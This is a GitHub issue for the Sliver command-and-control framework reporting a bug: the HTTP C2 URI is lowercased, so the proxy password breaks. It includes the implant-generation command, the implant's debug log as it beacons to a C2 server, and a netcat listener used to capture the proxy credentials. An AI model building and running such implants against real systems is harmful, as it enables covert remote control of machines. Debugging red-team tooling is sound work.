Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

HTTP C2 URI lowercased, messing up proxy password #1126

Closed
akmalhisyam opened this issue Mar 2, 2023 · 0 comments
Closed

HTTP C2 URI lowercased, messing up proxy password #1126

akmalhisyam opened this issue Mar 2, 2023 · 0 comments
Labels
bug Something isn't working

Comments

@akmalhisyam
Copy link

akmalhisyam commented Mar 2, 2023
edited
Loading

Password became lowercased, causing authentication to fail

=====================
Generate
=====================

sliver > generate --http http://192.168.10.10/?proxy=http://098789:HehEhEyyyYyy@192.168.38.1:8080 --debug --name test002-linux --os linux

[*] Generating new linux/amd64 implant binary
[*] Build completed in 44s
[*] Implant saved to /root/test002-linux

=====================
Run implant
=====================

[user@pc ~]$ ./test002-linux
2023/03/02 21:44:51 sliver.go:87: Hello my name is test002-linux
2023/03/02 21:44:51 limits.go:58: Limit checks completed
2023/03/02 21:44:51 sliver.go:105: Running in session mode
2023/03/02 21:44:51 session.go:67: Starting interactive session connection loop ...
2023/03/02 21:44:51 transports.go:41: Starting c2 url generator () ...
2023/03/02 21:44:51 transports.go:95: Return generator: (chan *url.URL)(0xc0000287e0)
2023/03/02 21:44:51 transports.go:83: Yield c2 uri = 'http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080'
2023/03/02 21:44:51 transports.go:83: Yield c2 uri = 'http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080'
2023/03/02 21:44:51 session.go:84: Next CC = http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080
2023/03/02 21:44:51 session.go:84: Next CC = http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080
2023/03/02 21:44:51 transports.go:83: Yield c2 uri = 'http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080'
2023/03/02 21:44:51 session.go:172: Connecting -> http(s)://192.168.10.10
2023/03/02 21:44:51 gohttp.go:97: Force proxy "http://098789:heheheyyyyyy@192.168.38.1:8080"
2023/03/02 21:44:51 gohttp.go:107: Proxy URL = 'http://098789:heheheyyyyyy@192.168.38.1:8080'
2023/03/02 21:44:51 httpclient.go:672: [http] segments = [], filename = sign-up, ext = php
2023/03/02 21:44:51 crypto.go:189: TOTP Code (2023-03-02 13:44:51.694866088 +0000 UTC): 72621053
2023/03/02 21:44:51 httpclient.go:339: [http] POST -> https://192.168.10.10/sign-up.html?cn=7l2621053&m=18h740664 (106 bytes)

======================
"Proxy"
======================

[user@pc ~]$ sudo nc -lvp 8080
Listening on 0.0.0.0 8080
Connection received on hehe 57280
CONNECT 192.168.10.10:443 HTTP/1.1
Host: 192.168.10.10:443
User-Agent: Go-http-client/1.1
Proxy-Authorization: Basic MDk4Nzg5OmhlaGVoZXl5eXl5eQ==

[user@pc ~]$ echo MDk4Nzg5OmhlaGVoZXl5eXl5eQ== | base64 -d
098789:heheheyyyyyy
@moloch-- moloch-- added the bug Something isn't working label Mar 2, 2023
This was referenced Mar 26, 2023
Merged
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@moloch-- @akmalhisyam